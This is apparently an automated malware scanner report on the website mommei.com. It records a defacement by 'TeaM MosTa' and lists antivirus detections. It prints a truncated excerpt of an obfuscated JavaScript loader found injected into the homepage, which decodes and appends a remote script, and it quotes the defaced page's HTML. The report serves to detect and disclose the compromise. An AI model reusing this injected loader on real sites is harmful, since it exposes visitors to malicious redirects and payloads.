New scan:

Malware Scanner report for mommei.com

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

[HacKed By TeaM MosTa]  (7 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://mommei.com/
200 OK
Content-Length: 3738
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)

if (typeof(redef_colors)=="undefined") {

var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e8381', '#787f40', '#40413f', '#483d72', '#893d72', '#723e79', '#823e79', '#808474', '#81883d', '#7c787d', '#3d7f77', '#7f314d');
var redef_colors = 1;
var colors_picked = 0;
function div_pick_colors(t,styled) {
var s = "";
for (j=
... 642 bytes are skipped ...
!document.createElement){
document.write(div_pick_colors(div_colors,1));
} else {
var new_cstyle=document.createElement("script");
new_cstyle.type="text/javascript";
new_cstyle.src=div_pick_colors(div_colors,0);
document.getElementsByTagName("head")[0].appendChild(new_cstyle);
}
} catch(e) { }
try {
check_colors_picked();
} catch(e) {
setTimeout("try_pick_colors()", 500);
}
}
try_pick_colors();
}

Antivirus reports:

AntiVir
JS/Redirect.AC
Avast
JS:Redirector-IX [Trj]
Ikarus
Trojan.JS.Redirector
Rising
Trojan.Script.JS.Redirector.r
nProtect
Trojan.JS.Agent.EHT
K7AntiVirus
Trojan
Emsisoft
Trojan.JS.Agent.EHT (B)
Comodo
TrojWare.JS.Agent.AC
Kaspersky
Trojan.JS.Redirector.qe
Microsoft
VirTool:JS/Obfuscator.BK
MicroWorld-eScan
Trojan.JS.Agent.EHT
Fortinet
JS/Fraud.BBBK!tr
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.Redirector.ductl
F-Secure
Trojan.JS.Agent.EHT
F-Prot
JS/Redir.FN
AVG
JS/Redir
Norman
Obfuscated.CD
Sophos
JS/ScrLd-E
GData
Trojan.JS.Agent.EHT
Commtouch
JS/Redir.FN
ESET-NOD32
JS/Kryptik.W.Gen
BitDefender
Trojan.JS.Agent.EHT

Deface/Content modification. The following signature was found: [HacKed By TeaM MosTa]

<html dir="rtl">

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>[HacKed By TeaM MosTa]<title>
<meta name="keywords" content="TeaM MosTa [ TeaM MosTa ]">
</head>
<p align="center"><img src="http://islam.makcdn.com/image4555_500_361/500X361.jpg" alt="TeaM MosTa .!" width="322" height="269">

<body bgcolor="#000000">

<p align="center" dir="ltr">&nbsp;</p><script type="text/javascript">
if (typeof(redef_colors)=="undefin
...[3807 bytes skipped]...


http://mommei.com/test404page.js
404 Not Found
Content-Length: 1060
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mommei.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Nov 2014 23:30:03 GMT
Accept-Ranges: bytes
ETag: "2212470-e9a-4a3022f7fa840"
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding,User-Agent
Content-Length: 3738
Content-Type: text/html
Last-Modified: Wed, 11 May 2011 16:01:29 GMT

...3738 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mommei.com
Referer: http://www.google.com/search?q=mommei.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mommei.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mommei.com/

Result: mommei.com is not infected or malware details are not published yet.